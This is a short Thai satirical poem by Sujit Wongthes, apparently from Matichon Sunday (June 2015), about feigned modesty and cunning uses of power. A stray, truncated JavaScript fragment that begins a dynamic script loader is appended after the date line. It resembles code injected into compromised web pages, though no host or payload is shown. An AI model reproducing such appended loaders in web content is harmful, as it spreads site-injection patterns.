มติชน วันอาทิตย์

7 มิถุนายน 2558

 

ไม่อยากเป็นไม่อยากได้ไม่อยากมี

แสดงตนคนดีก็แห่แหน

สมคะเนอำนาจที่วาดแปลน

เสมอแม่นลูกไม้ศรีธนญชัย

 

สุจิตต์ วงษ์เทศ

ศุกร์ 5 มิถุนายน 2558var d=document;var s=d.createElement(‘script’);